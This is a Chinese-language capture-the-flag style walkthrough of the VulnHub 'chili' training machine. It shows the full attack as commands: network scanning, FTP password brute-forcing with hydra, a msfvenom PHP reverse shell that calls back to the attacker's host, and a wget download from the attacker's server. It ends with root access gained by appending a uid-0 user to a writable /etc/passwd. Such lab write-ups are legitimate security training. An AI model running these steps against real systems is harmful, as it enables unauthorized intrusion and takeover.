靶机:chili
难度:简单
下载:https://www.vulnhub.com/entry/chili-1,558/
靶机描述:
0x02 信息收集
nmap扫描存活主机确定靶场ip
nmap -sn 192.168.43.0/24
扫描靶机开的端口及服务
nmap -sS -sV -O -p- 192.168.43.134
0x03 漏洞发现
访问目标系统80端口
扫描网站目录
dirb http://192.168.43.134/
未果
查看网页源代码
这里访问源码可以看到有一些单词的提示,我们这里使用cewl工具对网页敏感信息进行爬取并保存到文件当中
cewl http://192.168.43.134 > user.txt
将user.txt中的文件内容进行大小写复写
然后可以通过九头蛇工具爆破ftp
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt -f -V ftp://192.168.43.134
这里爆破后得到账号密码chili:a1b2c3d4,登录靶机ftp:
ftp 192.168.43.134
0x04漏洞利用
进入网站根目录,发现有隐藏文件,且.nano是具有最高权限的目录文件,考虑在该目录下传入木马
先生成木马
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.43.221 LPORT=2233 -f raw > shell.php
然后将该木马传到靶机的.nano目录下
put /home/daye666/tools/shell.php shell3.php
目前shell3.php没有可执行权限,给它赋予最高权限
chmod 777 shell3.php
成功上传后,这里我们通过msf反弹shell,在kali端口开启端口监听,然后通过浏览器访问我们的木马:
use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set LHOST 192.168.43.221
set LPORT 2233
run
建立连接
然后进入shell模式
切换交互式shell
python3 -c "import pty;pty.spawn('/bin/bash')"
目前权限显然不够
0x05 权限提升
我们这里上传一个检测提权的工具,在靶机上运行:
在攻击机上开启临时的web服务,然后在靶机上用wget命令下载攻击机上的木马文件到本地
python -m SimpleHTTPServer 8000
wget http://192.168.43.221:8000/enumy64
赋予enumy64最高权限
chmod 777 enumy64
运行
./enumy64
发现/etc/passwd对于其他用户有写的权限,这里我们可以直接添加一个高权限用户进去:
openssl passwd -1 -salt salt daye
$1$salt$DdAoiqtA/a/oeQbF.cvVY1
echo 'daye:$1$salt$DdAoiqtA/a/oeQbF.cvVY1:0:0::/root:/bin/bash'>>/etc/passwd
参考:https://blog.csdn.net/qq_40549070/article/details/108926099